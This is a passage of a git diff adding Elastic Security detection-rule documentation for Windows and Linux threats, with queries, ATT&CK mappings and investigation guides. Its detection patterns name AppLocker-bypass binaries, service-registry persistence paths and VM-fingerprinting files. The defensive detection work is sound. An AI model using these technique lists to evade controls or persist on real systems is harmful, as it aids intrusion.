+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and process.name : "dns.exe" and event.type in ("creation", "deletion", "change") and + not file.name : "dns.log" and not + (file.extension : ("old", "temp", "bak", "dns", "arpa") and file.path : "C:\\Windows\\System32\\dns\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc new file mode 100644 index 0000000000..96531fe834 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc 
@@ -0,0 +1,189 @@ +[[prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary]] +=== Unusual Network Activity from a Windows System Binary + +Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Unusual Network Activity from a Windows System Binary + +Attackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution. + +This rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=5m + [process where host.os.type == "windows" and event.type == "start" and + + /* known applocker bypasses */ + (process.name : "bginfo.exe" or + process.name : "cdb.exe" or + process.name : "control.exe" or + process.name : "cmstp.exe" or + process.name : "csi.exe" or + process.name : "dnx.exe" or + process.name : "fsi.exe" or + process.name : "ieexec.exe" or + process.name : "iexpress.exe" or + process.name : "installutil.exe" or + process.name : "Microsoft.Workflow.Compiler.exe" or + process.name : "MSBuild.exe" or + process.name : "msdt.exe" or + process.name : "mshta.exe" or + process.name : "msiexec.exe" or + process.name : "msxsl.exe" or + process.name : "odbcconf.exe" or + process.name : "rcsi.exe" or + process.name : "regsvr32.exe" or + process.name : "xwizard.exe")] + [network where + (process.name : "bginfo.exe" or + process.name : "cdb.exe" or + process.name : "control.exe" or + process.name : "cmstp.exe" or + process.name : "csi.exe" or + process.name : "dnx.exe" or + process.name : "fsi.exe" or + process.name : "ieexec.exe" or + process.name : "iexpress.exe" or + process.name : "installutil.exe" or + process.name : "Microsoft.Workflow.Compiler.exe" or + process.name : "MSBuild.exe" or + process.name : "msdt.exe" or + process.name : "mshta.exe" or + ( + process.name : "msiexec.exe" and not + dns.question.name : ( + "ocsp.digicert.com", "ocsp.verisign.com", "ocsp.comodoca.com", "ocsp.entrust.net", "ocsp.usertrust.com", + "ocsp.godaddy.com", "ocsp.camerfirma.com", "ocsp.globalsign.com", "ocsp.sectigo.com", "*.local" + ) + ) or + process.name : "msxsl.exe" or + process.name : "odbcconf.exe" or + process.name : "rcsi.exe" or + process.name : "regsvr32.exe" or + process.name : "xwizard.exe")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** 
ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ +* Sub-technique: +** Name: Mshta +** ID: T1218.005 +** Reference URL: https://attack.mitre.org/techniques/T1218/005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc new file mode 100644 index 0000000000..e36f82def6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc 
@@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-unusual-persistence-via-services-registry]] +=== Unusual Persistence via Services Registry + +Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", + "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" + ) and not registry.data.strings : ( + "?:\\windows\\system32\\Drivers\\*.sys", + "\\SystemRoot\\System32\\drivers\\*.sys", + "\\??\\?:\\Windows\\system32\\Drivers\\*.SYS", + "system32\\DRIVERS\\USBSTOR") and + not (process.name : "procexp??.exe" and registry.data.strings : "?:\\*\\procexp*.sys") and + not process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Windows\\winsxs\\*\\TiWorker.exe", + "?:\\Windows\\System32\\drvinst.exe", + "?:\\Windows\\System32\\services.exe", + 
"?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\System32\\regsvr32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..296d650759 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc 
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host]] +=== Unusual Process Spawned by a Host + +A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..7a88a914f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc 
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process]] +=== Unusual Process Spawned by a Parent Process + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..72a9485a20 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc 
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user]] +=== Unusual Process Spawned by a User + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc new file mode 100644 index 0000000000..12603fcc9d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc 
@@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device]] +=== Unusual Process Writing Data to an External Device + +A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc new file mode 100644 index 0000000000..fdd74db5f3 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc 
@@ -0,0 +1,107 @@ +[[prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service]] +=== Unusual Service Host Child Process - Childless Service + +Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "svchost.exe" and + + /* based on svchost service arguments -s svcname where the service is known to be childless */ + + process.parent.args : ("WdiSystemHost","LicenseManager", + "StorSvc","CDPSvc","cdbhsvc","BthAvctpSvc","SstpSvc","WdiServiceHost", + "imgsvc","TrkWks","WpnService","IKEEXT","PolicyAgent","CryptSvc", + "netprofm","ProfSvc","StateRepository","camsvc","LanmanWorkstation", + "NlaSvc","EventLog","hidserv","DisplayEnhancementService","ShellHWDetection", + "AppHostSvc","fhsvc","CscService","PushToInstall") and + + /* unknown FPs can be added here */ + + not process.name : ("WerFault.exe","WerFaultSecure.exe","wermgr.exe") and + not (process.executable : 
"?:\\Windows\\System32\\RelPost.exe" and process.parent.args : "WdiSystemHost") and + not (process.name : "rundll32.exe" and + process.args : "?:\\WINDOWS\\System32\\winethc.dll,ForceProxyDetectionOnNextRun" and process.parent.args : "WdiServiceHost") and + not (process.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\System32\\Kodak\\kds_i4x50\\lib\\lexexe.exe") and + process.parent.args : "imgsvc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc new file mode 100644 index 0000000000..09d15add19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc 
@@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id]] +=== Unusual User Privilege Enumeration via id + +This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "id" and process.args_count == 2 and + not (process.parent.name == "rpm" or process.parent.args : "/var/tmp/rpm-tmp*")] with runs=20 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc new file mode 100644 index 0000000000..443b3e1f90 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc 
@@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-virtual-machine-fingerprinting]] +=== Virtual Machine Fingerprinting + +An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and + process.args:("/sys/class/dmi/id/bios_version" or + "/sys/class/dmi/id/product_name" or + "/sys/class/dmi/id/chassis_vendor" or + "/proc/scsi/scsi" or + "/proc/ide/hd0/model") and + not user.name:root + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc new file mode 100644 index 0000000000..4f5cebc4b9 
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc 
@@ -0,0 +1,148 @@ +[[prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell]] +=== Volume Shadow Copy Deletion via PowerShell + +Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy +* https://powershell.one/wmi/root/cimv2/win32_shadowcopy +* https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Volume Shadow Copy Deletion via PowerShell + +The Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders. + +A typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring. 
+ +This rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them. + +#### Possible investigation steps + +- Investigate the program execution chain (parent process tree). +- Check whether the account is authorized to perform this operation. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences in other hosts. +- Check if any files on the host machine have been encrypted. + + +### False positive analysis + +- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Related rules + +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. 
